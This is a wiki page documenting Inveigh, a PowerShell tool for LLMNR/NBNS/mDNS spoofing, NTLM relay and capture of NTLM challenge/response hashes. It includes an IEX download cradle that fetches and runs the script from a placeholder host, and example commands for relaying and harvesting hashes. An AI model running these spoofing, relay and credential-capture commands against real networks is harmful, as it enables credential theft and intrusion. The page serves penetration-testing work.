Skip to content
Marwâne Chahed edited this page May 9, 2020 · 9 revisions

Import

  • Import with Import-Module
    Import-Module ./Inveigh.psd1

  • Import using the dot source method
    . ./Inveigh.ps1
    . ./Inveigh-Relay.ps1

  • Load into memory using Invoke-Expression
    IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh.ps1")
    IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh-Relay.ps1")

System Requirements

  • Tested minimums are PowerShell 2.0 and .NET 3.5

Tips

  • If a local firewall is enabled, ensure that the targets are able to communicate with the Inveigh host on the relevant ports.
  • If you copy/paste challenge/response captures from the console window for password cracking, ensure that carriage returns are removed.

Defaults

Inveigh - elevated privilege mode enabled

Invoke-Inveigh

  • HTTP listener on port 80 with HTTP and WPAD authentication set to NTLM
  • LLMNR spoofer - packet sniffer version
  • SMB NTLMv1 and NTLMv2 challenge/response capture through the packet sniffer
  • Real time console and file outputs are disabled

Inveigh - elevated privilege mode disabled

Invoke-Inveigh

  • HTTP listener on port 80 with HTTP and WPAD authentication set to NTLM
  • LLMNR spoofer - UDP listener version (likely to be disabled at startup due to Windows default in-use UDP port 5355)
  • NBNS spoofer - UDP listener version
  • Real time console and file outputs are disabled

Inveigh-Relay

Invoke-InveighRelay -Target 192.168.1.100 -Command "do something"

  • HTTP listener on port 80 with HTTP and WPAD authentication set to NTLM
  • Running Inveigh modules will auto-exit after a successful relay
  • Target and Command parameters are mandatory
  • Real time console and file outputs are disabled

Support Functions

Both the Inveigh.ps1 and Inveigh-Relay.ps1 files contain identical support functions that permit data retrieval and interaction with the main Inveigh and Inveigh-Relay modules.

  • Clear-Inveigh - clear the $inveigh hashtable
  • Get-Inveigh - get data from the $inveigh hashtable
  • Stop-Inveigh - stop all running Inveigh modules
  • Watch-Inveigh - enable real time console output

Examples

  • Enable real time console output
    Invoke-Inveigh -ConsoleOutput Y

  • Enable inspection only and real time console output
    Invoke-Inveigh -Inspect -ConsoleOutput Y

  • Enable real time file output at startup
    Invoke-Inveigh -FileOutput Y

  • Enable the NBNS and mDNS spoofers
    Invoke-Inveigh -NBNS Y -mDNS Y

  • Enable HTTPS with customized certificate settings
    Invoke-Inveigh -HTTPS Y -HTTPSCertIssuer PowerShell -HTTPSCertSubject www

  • Enable proxy authentication captures
    Invoke-Inveigh -Proxy Y

  • Stop running Inveigh modules
    Stop-Inveigh

  • Get all queued console output
    Get-Inveigh

  • Get all captured NTLMv2 challenge/response hashes
    Get-Inveigh -NTLMv2